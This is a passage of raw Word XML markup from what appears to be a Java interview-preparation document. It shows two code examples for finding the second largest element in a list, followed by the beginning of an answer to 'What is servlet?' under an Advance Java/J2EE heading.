          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Program - How to find the second largest element from the list?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="385"/>
    </w:p>
    <w:p w14:paraId="1B75E442" w14:textId="3FB82710" w:rsidR="007D023E" w:rsidRPr="00CE4B95" w:rsidRDefault="007D023E" w:rsidP="007D023E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B8144C6" w14:textId="77777777" w:rsidR="00D57158" w:rsidRPr="00CE4B95" w:rsidRDefault="00D57158" w:rsidP="00D57158">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Java 8 Streams Approach (Cleanest):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CE7E53C" w14:textId="77777777" w:rsidR="00117525" w:rsidRPr="00CE4B9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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>import</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> 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til</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.*;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0751EAF8" w14:textId="77777777" w:rsidR="00117525" w:rsidRPr="00CE4B9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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CAFDA19" w14:textId="77777777" w:rsidR="00117525" w:rsidRPr="00CE4B9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condLarges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14EDF27" w14:textId="77777777" w:rsidR="00117525" w:rsidRPr="00CE4B9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9D3AE90" w14:textId="77777777" w:rsidR="00117525" w:rsidRPr="00CE4B9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numbers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9</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7</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9</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08DCAA86" w14:textId="77777777" w:rsidR="00117525" w:rsidRPr="00CE4B9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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="148692DA" w14:textId="77777777" w:rsidR="00117525" w:rsidRPr="00CE4B9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Optional</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Integer</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secondLarges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be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ream</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09BC6334" w14:textId="77777777" w:rsidR="00117525" w:rsidRPr="00CE4B9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istinct</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B368999" w14:textId="77777777" w:rsidR="00117525" w:rsidRPr="00CE4B9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orted</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omparat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verseOrder</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="164985E8" w14:textId="77777777" w:rsidR="00117525" w:rsidRPr="00CE4B9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kip</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1DA2C829" w14:textId="77777777" w:rsidR="00117525" w:rsidRPr="00CE4B9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indFirst</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08E58D30" w14:textId="77777777" w:rsidR="00117525" w:rsidRPr="00CE4B9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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69661811" w14:textId="77777777" w:rsidR="00117525" w:rsidRPr="00CE4B9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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        secondLarge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fPresentOrElse</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CB635C5" w14:textId="77777777" w:rsidR="00117525" w:rsidRPr="00CE4B9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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">            val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econd Larges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val</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45398821" w14:textId="77777777" w:rsidR="00117525" w:rsidRPr="00CE4B9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ot enough distinct elements"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B28315B" w14:textId="77777777" w:rsidR="00117525" w:rsidRPr="00CE4B9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FFA41F4" w14:textId="77777777" w:rsidR="00117525" w:rsidRPr="00CE4B9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159880C" w14:textId="58E7B7B1" w:rsidR="00117525" w:rsidRPr="00CE4B9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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>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15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26493A19" w14:textId="77777777" w:rsidR="00D57158" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00D57158">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758249C">
          <v:rect id="_x0000_i1903" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="624687A1" w14:textId="77777777" w:rsidR="00D57158" w:rsidRPr="00CE4B95" w:rsidRDefault="00D57158" w:rsidP="00D57158">
      <w:pPr>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2. Classic Iterative Approach (Single Pass, O(n)):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B37CBB2" w14:textId="77777777" w:rsidR="00B574AC" w:rsidRPr="00CE4B95"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condLarges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68E3492" w14:textId="77777777" w:rsidR="00B574AC" w:rsidRPr="00CE4B95"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88394C3" w14:textId="77777777" w:rsidR="00B574AC" w:rsidRPr="00CE4B95"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5</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9</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7</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9</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>};</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AEEE0DF" w14:textId="77777777" w:rsidR="00B574AC" w:rsidRPr="00CE4B95"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5935914B" w14:textId="77777777" w:rsidR="00B574AC" w:rsidRPr="00CE4B95"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000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> larges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p>
    <w:p w14:paraId="7713D29E" w14:textId="77777777" w:rsidR="00B574AC" w:rsidRPr="00CE4B95"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teger</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> secon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p>
    <w:p w14:paraId="4E83F893" w14:textId="77777777" w:rsidR="00B574AC" w:rsidRPr="00CE4B95"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37E3FEF0" w14:textId="77777777" w:rsidR="00B574AC" w:rsidRPr="00CE4B95"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n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0B8075E" w14:textId="77777777" w:rsidR="00B574AC" w:rsidRPr="00CE4B95"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larges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large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EFF743E" w14:textId="77777777" w:rsidR="00B574AC" w:rsidRPr="00CE4B95"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                secon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largest</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="591B5938" w14:textId="77777777" w:rsidR="00B574AC" w:rsidRPr="00CE4B95"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                largest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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="093AAC5D" w14:textId="77777777" w:rsidR="00B574AC" w:rsidRPr="00CE4B95"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ls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secon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secon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amp;&amp;</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> num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large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AF3184B" w14:textId="77777777" w:rsidR="00B574AC" w:rsidRPr="00CE4B95"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                secon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num</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AF7CB0A" w14:textId="77777777" w:rsidR="00B574AC" w:rsidRPr="00CE4B95"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F3517A6" w14:textId="77777777" w:rsidR="00B574AC" w:rsidRPr="00CE4B95"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2D90D0D" w14:textId="77777777" w:rsidR="00B574AC" w:rsidRPr="00CE4B95"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BD68C14" w14:textId="77777777" w:rsidR="00B574AC" w:rsidRPr="00CE4B95"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secon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ul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0C8CBBC" w14:textId="77777777" w:rsidR="00B574AC" w:rsidRPr="00CE4B95"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econd Largest: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econd</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="523CB780" w14:textId="77777777" w:rsidR="00B574AC" w:rsidRPr="00CE4B95"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ls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E5878EC" w14:textId="77777777" w:rsidR="00B574AC" w:rsidRPr="00CE4B95"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o second largest element found."</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2323E441" w14:textId="77777777" w:rsidR="00B574AC" w:rsidRPr="00CE4B95"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2F86875" w14:textId="77777777" w:rsidR="00B574AC" w:rsidRPr="00CE4B95"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6C10353" w14:textId="44F05D84" w:rsidR="00B574AC" w:rsidRPr="00CE4B95"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B891FC2" w14:textId="77777777" w:rsidR="006B2527" w:rsidRPr="00CE4B95" w:rsidRDefault="006B2527" w:rsidP="006B2527">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1FB6CC4B" w14:textId="268E5BBA" w:rsidR="001D2607" w:rsidRPr="00CE4B95" w:rsidRDefault="001D2607" w:rsidP="005F51EC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="32D236A3" w14:textId="7625B5A7" w:rsidR="008F201A" w:rsidRPr="00CE4B95" w:rsidRDefault="008F201A" w:rsidP="008F201A">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="386" w:name="_Toc196307866"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Advance Java / J2EE</w:t>
      </w:r>
      <w:bookmarkEnd w:id="386"/>
    </w:p>
    <w:p w14:paraId="118CE4A7" w14:textId="77777777" w:rsidR="0026446D" w:rsidRPr="00CE4B95" w:rsidRDefault="0026446D" w:rsidP="0026446D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="423CF408" w14:textId="0F5E8E77" w:rsidR="00502122" w:rsidRPr="00CE4B95" w:rsidRDefault="00BF2FAE">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="387" w:name="_Toc196307867"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is servlet</w:t>
      </w:r>
      <w:r w:rsidR="00502122" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="387"/>
    </w:p>
    <w:p w14:paraId="330C59E8" w14:textId="44E74B85" w:rsidR="00A9612B" w:rsidRPr="00CE4B95" w:rsidRDefault="00A9612B" w:rsidP="002704B6">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Servlet</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Java class</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> used to handle </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>HTTP requests and responses</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>web applications</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BE1DC30" w14:textId="77777777" w:rsidR="00A9612B" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="002704B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1F31DFA">
          <v:rect id="_x0000_i1904" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="22C92582" w14:textId="77777777" w:rsidR="00A9612B" w:rsidRPr="00CE4B95" w:rsidRDefault="00A9612B" w:rsidP="002704B6">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Definition:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19B0C0AC" w14:textId="77777777" w:rsidR="00A9612B" w:rsidRPr="00CE4B95" w:rsidRDefault="00A9612B" w:rsidP="002704B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Servlet</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a Java program that runs on a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Java-enabled web server</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (like Tomcat) and acts as a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>middle layer</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
